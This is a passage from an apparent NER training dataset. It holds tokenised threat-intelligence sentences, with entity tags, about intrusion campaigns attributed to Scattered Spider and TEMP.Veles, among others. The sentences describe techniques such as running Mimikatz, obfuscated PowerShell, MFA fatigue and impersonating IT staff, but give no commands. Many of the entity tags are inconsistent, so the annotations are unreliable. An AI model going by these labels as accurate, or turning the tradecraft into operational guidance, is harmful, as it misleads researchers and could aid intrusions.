"and", + "other", + "tools", + "to", + "machines", + "in", + "the", + "network", + "using", + "AnyDesk", + "and", + "PDQ", + "Deploy." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "AvosLocker", + "was", + "disguised", + "using", + "the", + "victim", + "company", + "name", + "as", + "the", + "filename." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0018,", + "the", + "threat", + "actors", + "renamed", + "a", + "Sliver", + "payload", + "to", + "`vmware_kb.exe`." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "the", + "SoftPerfect", + "Network", + "Scanner", + "for", + "network", + "scanning." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "opened", + "a", + "variety", + "of", + "ports,", + "including", + "ports", + "28035,", + "32467,", + "41578,", + "and", + "46892,", + "to", + "establish", + "RDP", + "connections." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "encoded", + "PowerShell", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "AnyDesk", + "to", + "transfer", + "tools", + "between", + "systems." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "opened", + "a", + "variety", + "of", + "ports", + "to", + "establish", + "RDP", + "connections,", + "including", + "ports", + "28035,", + "32467,", + "41578,", + "and", + "46892." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "`rundll32`", + "to", + "run", + "Mimikatz." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "PDQ", + "Deploy", + "to", + "move", + "AvosLocker", + "and", + "tools", + "across", + "the", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "ran", + "`nslookup`", + "and", + "Advanced", + "IP", + "Scanner", + "on", + "the", + "target", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "collected", + "`whoami`", + "information", + "via", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "For", + "C0018,", + "the", + "threat", + "actors", + "acquired", + "a", + "variety", + "of", + "open", + "source", + "tools,", + "including", + "Mimikatz,", + "Sliver,", + "SoftPerfect", + "Network", + "Scanner,", + "AnyDesk,", + "and", + "PDQ", + "Deploy." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "I-Tool", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "WMIC", + "to", + "modify", + "administrative", + "settings", + "on", + "both", + "a", + "local", + "and", + "a", + "remote", + "host,", + "likely", + "as", + "part", + "of", + "the", + "first", + "stages", + "for", + "their", + "lateral", + "movement;", + "they", + "also", + "used", + "WMI", + "Provider", + "Host", + "(`wmiprvse.exe`)", + "to", + "execute", + "a", + "variety", + "of", + "encoded", + "PowerShell", + "scripts", + "using", + "the", + "`DownloadString`", + "method." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "used", + "SSL", + "via", + "TCP", + "port", + "443", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "used", + "encoded", + "PowerShell", + "commands." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "deobfuscated", + "encoded", + "PowerShell", + "commands", + "including", + "use", + "of", + "the", + "specific", + "string", + "`'FromBase'+0x40+'String'`,", + "in", + "place", + "of", + "`FromBase64String`", + "which", + "is", + "normally", + "used", + "to", + "decode", + "base64." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0021,", + "the", + "threat", + "actors", + "registered", + "domains", + "for", + "use", + "in", + "C2." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0021,", + "the", + "threat", + "actors", + "used", + "legitimate", + "but", + "compromised", + "domains", + "to", + "host", + "malicious", + "payloads." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0021,", + "the", + "threat", + "actors", + "embedded", + "a", + "base64-encoded", + "payload", + "within", + "a", + "LNK", + "file." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "downloaded", + "additional", + "tools", + "and", + "files", + "onto", + "victim", + "machines." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "lured", + "users", + "into", + "clicking", + "a", + "malicious", + "link", + "which", + "led", + "to", + "the", + "download", + "of", + "a", + "ZIP", + "archive", + "containing", + "a", + "malicious", + ".LNK", + "file." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "used", + "TCP", + "for", + "some", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "used", + "obfuscated", + "PowerShell", + "to", + "extract", + "an", + "encoded", + "payload", + "from", + "within", + "an", + ".LNK", + "file." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "used", + "`rundll32.exe`", + "to", + "execute", + "the", + "Cobalt", + "Strike", + "Beacon", + "loader", + "DLL." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "sent", + "phishing", + "emails", + "with", + "unique", + "malicious", + "links,", + "likely", + "for", + "tracking", + "victim", + "clicks." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0021,", + "the", + "threat", + "actors", + "used", + "Cobalt", + "Strike", + "configured", + "with", + "a", + "modified", + "variation", + "of", + "the", + "publicly", + "available", + "Pandora", + "Malleable", + "C2", + "Profile." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0021,", + "the", + "threat", + "actors", + "uploaded", + "malware", + "to", + "websites", + "under", + "their", + "control." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0021,", + "the", + "threat", + "actors", + "used", + "HTTP", + "for", + "some", + "of", + "their", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0026,", + "the", + "threat", + "actors", + "used", + "WinRAR", + "to", + "collect", + "documents", + "on", + "targeted", + "systems.", + "The", + "threat", + "actors", + "appeared", + "to", + "only", + "exfiltrate", + "files", + "created", + "after", + "January", + "1,", + "2021." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Time", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0026,", + "the", + "threat", + "actors", + "split", + "encrypted", + "archives", + "containing", + "stolen", + "files", + "and", + "information", + "into", + "3MB", + "parts", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0026,", + "the", + "threat", + "actors", + "collected", + "documents", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0026,", + "the", + "threat", + "actors", + "re-registered", + "expired", + "C2", + "domains", + "previously", + "used", + "for", + "ANDROMEDA", + "malware." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "C0026,", + "the", + "threat", + "actors", + "re-registered", + "a", + "ClouDNS", + "dynamic", + "DNS", + "subdomain", + "which", + "was", + "previously", + "used", + "by", + "ANDROMEDA." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "C0026,", + "the", + "threat", + "actors", + "downloaded", + "malicious", + "payloads", + "onto", + "select", + "compromised", + "hosts." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "aws_consoler", + "to", + "create", + "temporary", + "federated", + "credentials", + "for", + "fake", + "users", + "in", + "order", + "to", + "obfuscate", + "which", + "AWS", + "credential", + "is", + "compromised", + "and", + "enable", + "pivoting", + "from", + "the", + "AWS", + "CLI", + "to", + "console", + "sessions", + "without", + "MFA." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "IAM", + "manipulation", + "to", + "gain", + "persistence", + "and", + "to", + "assume", + "or", + "elevate", + "privileges." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "accessed", + "Azure", + "AD", + "to", + "download", + "bulk", + "lists", + "of", + "group", + "members", + "and", + "to", + "identify", + "privileged", + "users,", + "along", + "with", + "the", + "email", + "addresses", + "and", + "AD", + "attributes." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "leveraged", + "compromised", + "credentials", + "from", + "victim", + "users", + "to", + "authenticate", + "to", + "Azure", + "tenants." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "accessed", + "Azure", + "AD", + "to", + "download", + "bulk", + "lists", + "of", + "group", + "members", + "and", + "their", + "Active", + "Directory", + "attributes." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Features", + "B-Exp", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "compromised", + "Azure", + "credentials", + "for", + "credential", + "theft", + "activity", + "and", + "lateral", + "movement", + "to", + "on-premises", + "systems." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "O", + "B-Way", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "access", + "to", + "the", + "victim's", + "Azure", + "tenant", + "to", + "create", + "Azure", + "VMs." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "sent", + "phishing", + "messages", + "via", + "SMS", + "to", + "steal", + "credentials." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "performed", + "domain", + "replication." + ], + "ner_tags": [ + "O", + "B-Features", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "accessed", + "victim", + "OneDrive", + "environments", + "to", + "search", + "for", + "VPN", + "and", + "MFA", + "enrollment", + "information,", + "help", + "desk", + "instructions,", + "and", + "new", + "hire", + "guides." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "registered", + "devices", + "for", + "MFA", + "to", + "maintain", + "persistence", + "through", + "victims'", + "VPN." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "accessed", + "Azure", + "AD", + "to", + "identify", + "email", + "addresses." + ], + "ner_tags": [ + "O", + "B-Features", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "exploited", + "CVE-2021-35464", + "in", + "the", + "ForgeRock", + "Open", + "Access", + "Management", + "(OpenAM)", + "application", + "server", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "Citrix", + "and", + "VPNs", + "to", + "persist", + "in", + "compromised", + "environments." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "impersonated", + "legitimate", + "IT", + "personnel", + "in", + "phone", + "calls", + "and", + "text", + "messages", + "either", + "to", + "direct", + "victims", + "to", + "a", + "credential", + "harvesting", + "site", + "or", + "getting", + "victims", + "to", + "run", + "commercial", + "remote", + "monitoring", + "and", + "management", + "(RMM)", + "tools." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Org", + "I-Org", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "downloaded", + "tools", + "using", + "victim", + "organization", + "systems." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Area", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "attempted", + "to", + "gain", + "access", + "by", + "continuously", + "sending", + "MFA", + "messages", + "to", + "the", + "victim", + "until", + "they", + "accept", + "the", + "MFA", + "push", + "challenge." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "used", + "RustScan", + "to", + "scan", + "for", + "open", + "ports", + "on", + "targeted", + "ESXi", + "appliances." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "SSH", + "tunneling", + "in", + "targeted", + "environments." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "installed", + "the", + "open-source", + "rsocx", + "reverse", + "proxy", + "tool", + "on", + "a", + "targeted", + "ESXi", + "appliance." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "directed", + "victims", + "to", + "run", + "remote", + "monitoring", + "and", + "management", + "(RMM)", + "tools." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "accessed", + "victim", + "SharePoint", + "environments", + "to", + "search", + "for", + "VPN", + "and", + "MFA", + "enrollment", + "information,", + "help", + "desk", + "instructions,", + "and", + "new", + "hire", + "guides." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "sent", + "Telegram", + "messages", + "impersonating", + "IT", + "personnel", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "phone", + "calls", + "to", + "instruct", + "victims", + "to", + "navigate", + "to", + "credential-harvesting", + "websites." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "impersonated", + "legitimate", + "IT", + "personnel", + "in", + "phone", + "calls", + "to", + "direct", + "victims", + "to", + "download", + "a", + "remote", + "monitoring", + "and", + "management", + "(RMM)", + "tool", + "that", + "would", + "allow", + "the", + "adversary", + "to", + "remotely", + "control", + "their", + "system." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "obtained", + "and", + "used", + "multiple", + "tools", + "including", + "the", + "LINpeas", + "privilege", + "escalation", + "utility,", + "aws_consoler,", + "rsocx", + "reverse", + "proxy,", + "Level", + "RMM", + "tool,", + "and", + "RustScan", + "port", + "scanner." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "B-Way", + "I-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "downloaded", + "tools", + "from", + "sites", + "including", + "file.io,", + "GitHub,", + "and", + "paste.ee." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "Windows", + "Management", + "Instrumentation", + "(WMI)", + "to", + "move", + "laterally", + "via", + "Impacket." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "VPN", + "access", + "to", + "persist", + "in", + "the", + "victim", + "environment." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "B-Tool", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "routinely", + "deleted", + "tools,", + "logs,", + "and", + "other", + "files", + "after", + "they", + "were", + "finished", + "with", + "them." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "modified", + "and", + "added", + "entries", + "within", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Image", + "File", + "Execution", + "Options</code>", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "Mimikatz", + "and", + "a", + "custom", + "tool,", + "SecHack,", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "staging", + "folders", + "that", + "are", + "infrequently", + "used", + "by", + "legitimate", + "users", + "or", + "processes", + "to", + "store", + "data", + "for", + "exfiltration", + "and", + "tool", + "deployment." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "renamed", + "files", + "to", + "look", + "like", + "legitimate", + "files,", + "such", + "as", + "Windows", + "update", + "files", + "or", + "Schneider", + "Electric", + "application", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "port-protocol", + "mismatches", + "on", + "ports", + "such", + "as", + "443,", + "4444,", + "8531,", + "and", + "50501", + "during", + "C2." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "PowerShell", + "to", + "perform", + "timestomping." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "encrypted", + "SSH-based", + "PLINK", + "tunnels", + "to", + "transfer", + "tools", + "and", + "enable", + "RDP", + "connections", + "throughout", + "the", + "environment." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "B-Tool", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "utilized", + "RDP", + "throughout", + "an", + "operation." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "B-Way", + "O", + "O", + 